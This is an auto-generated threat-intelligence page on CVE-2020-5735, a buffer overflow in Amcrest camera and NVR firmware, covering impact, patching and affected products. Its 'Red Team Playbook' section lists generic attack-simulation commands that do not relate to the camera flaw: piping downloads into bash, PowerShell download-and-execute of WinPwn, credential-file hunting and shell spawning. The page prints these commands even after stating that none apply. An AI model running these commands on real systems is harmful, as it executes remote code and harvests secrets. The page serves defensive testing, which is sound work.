CVE-2020-5735
Overview
This vulnerability is a stack-based buffer overflow in Amcrest camera and NVR firmware. The root cause is improper bounds checking on input data received over TCP port 37777, which leads to overwriting the stack memory. The affected component is the network service handling authenticated commands on port 37777, specifically within the packet processing routine of the device firmware.
Vulnerability Description
Amcrest cameras and NVR are vulnerable to a stack-based buffer overflow over port 37777. An authenticated remote attacker can abuse this issue to crash the device and possibly execute arbitrary code.
Impact
An attacker with authenticated access to the device can exploit this vulnerability to crash the device, resulting in denial of service. Additionally, the attacker may execute arbitrary code on the device, potentially gaining control over the camera or NVR system. This could lead to unauthorized surveillance, lateral movement within the network, or compromise of sensitive video data. The prerequisite is possession of valid authentication credentials, which may be obtained through other means or insider threat.
Solution
Amcrest recommends updating affected devices to the latest firmware versions that address this vulnerability. Specific firmware updates are available for models 1080-lite_8ch, amdv10814-h5, ipm-721, ip2m-841, and ip2m-841-v3. Detailed patch instructions and firmware downloads can be found in the official Amcrest advisories and at https://www.tenable.com/security/research/tra-2020-20. Users should apply these updates promptly to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting Amcrest cameras and network video recorders (NVR) is characterized by a stack-based buffer overflow that occurs over port 37777. This flaw arises from improper handling of input data, allowing an authenticated remote attacker to send specially crafted packets that exceed the allocated buffer size. As a result, the overflow can lead to memory corruption, potentially enabling the attacker to crash the device or execute arbitrary code. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk that warrants immediate attention from users and administrators of the affected devices.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting authenticated users who have access to the device's management interface. An attacker could leverage stolen credentials or exploit weak authentication mechanisms to gain access. Once authenticated, the attacker could send malicious payloads to the vulnerable service running on port 37777, leading to a denial of service or remote code execution. Scenarios may include targeting surveillance systems in sensitive environments, where the compromise of video feeds could have far-reaching implications for security and privacy.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Amcrest devices for surveillance and security. A successful attack could result in unauthorized access to video streams, manipulation of recorded footage, or even the complete shutdown of security systems. This not only poses a direct threat to physical security but also raises concerns about data integrity and compliance with privacy regulations. Businesses could face reputational damage, financial losses, and legal ramifications if sensitive information is exposed or if surveillance systems are rendered inoperable during critical incidents.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions provided by Amcrest is crucial, as these updates often contain patches for known vulnerabilities. Additionally, employing network segmentation can help isolate vulnerable devices from critical infrastructure, limiting the potential impact of an exploit. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Furthermore, enforcing strong authentication practices and regularly reviewing user access controls can significantly reduce the risk of unauthorized access.
In conclusion, the stack-based buffer overflow vulnerability in Amcrest cameras and NVRs presents a serious threat that can lead to significant operational disruptions and security breaches. Organizations must prioritize the identification and remediation of this vulnerability to safeguard their surveillance systems and protect sensitive data. By adopting proactive security measures and maintaining vigilance against potential exploits, businesses can mitigate the risks associated with this critical vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in activity exploiting the stack-based buffer overflow vulnerability affecting Amcrest cameras and NVRs. Although the EPSS score has declined, indicating a reduced likelihood of widespread exploitation, our telemetry reveals a recent uptick in targeted attempts, including the emergence of new proof-of-concept exploits demonstrating denial-of-service capabilities. This shift underscores a persistent adversary interest in leveraging this vulnerability to disrupt surveillance infrastructure. For defenders, the increased detection activity signals that threat actors remain actively probing these devices, potentially as a precursor to more sophisticated attacks. Consequently, while the overall risk level may appear moderated by EPSS trends, the tangible rise in exploitation attempts elevates the operational threat, warranting continued vigilance in monitoring and response efforts.
Affected Products (18)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Amcrest | 1080-Lite 8ch Firmware | N/A |
cpe:2.3:o:amcrest:1080-lite_8ch_firmware:-:*:*:*:*:*:*:*
|
|
|
Amcrest | Amdv10814-H5 Firmware | N/A |
cpe:2.3:o:amcrest:amdv10814-h5_firmware:-:*:*:*:*:*:*:*
|
|
|
Amcrest | Ipm-721 Firmware | All |
cpe:2.3:o:amcrest:ipm-721_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-841 Firmware | All |
cpe:2.3:o:amcrest:ip2m-841_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-841-V3 Firmware | All |
cpe:2.3:o:amcrest:ip2m-841-v3_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-853ew Firmware | All |
cpe:2.3:o:amcrest:ip2m-853ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-858w Firmware | All |
cpe:2.3:o:amcrest:ip2m-858w_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-866w Firmware | All |
cpe:2.3:o:amcrest:ip2m-866w_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip2m-866ew Firmware | All |
cpe:2.3:o:amcrest:ip2m-866ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip4m-1053ew Firmware | All |
cpe:2.3:o:amcrest:ip4m-1053ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-2454ew Firmware | All |
cpe:2.3:o:amcrest:ip8m-2454ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-2493eb Firmware | All |
cpe:2.3:o:amcrest:ip8m-2493eb_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-2496eb Firmware | All |
cpe:2.3:o:amcrest:ip8m-2496eb_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-2597e Firmware | All |
cpe:2.3:o:amcrest:ip8m-2597e_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-Mb2546ew Firmware | All |
cpe:2.3:o:amcrest:ip8m-mb2546ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-Mt2544ew Firmware | All |
cpe:2.3:o:amcrest:ip8m-mt2544ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ip8m-T2499ew Firmware | All |
cpe:2.3:o:amcrest:ip8m-t2499ew_firmware:*:*:*:*:*:*:*:*
|
|
|
Amcrest | Ipm-Hx1 Firmware | All |
cpe:2.3:o:amcrest:ipm-hx1_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) | Jacob Baines | dos | hardware | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5735 |
| tenable.com |
GitHub CVE
x_refsource_MISC
|
https://www.tenable.com/security/research/tra-2020-20 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157164/Amcrest-Dahua-NVR-Camera-IP2M-841-Denial-Of-Service.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5735 |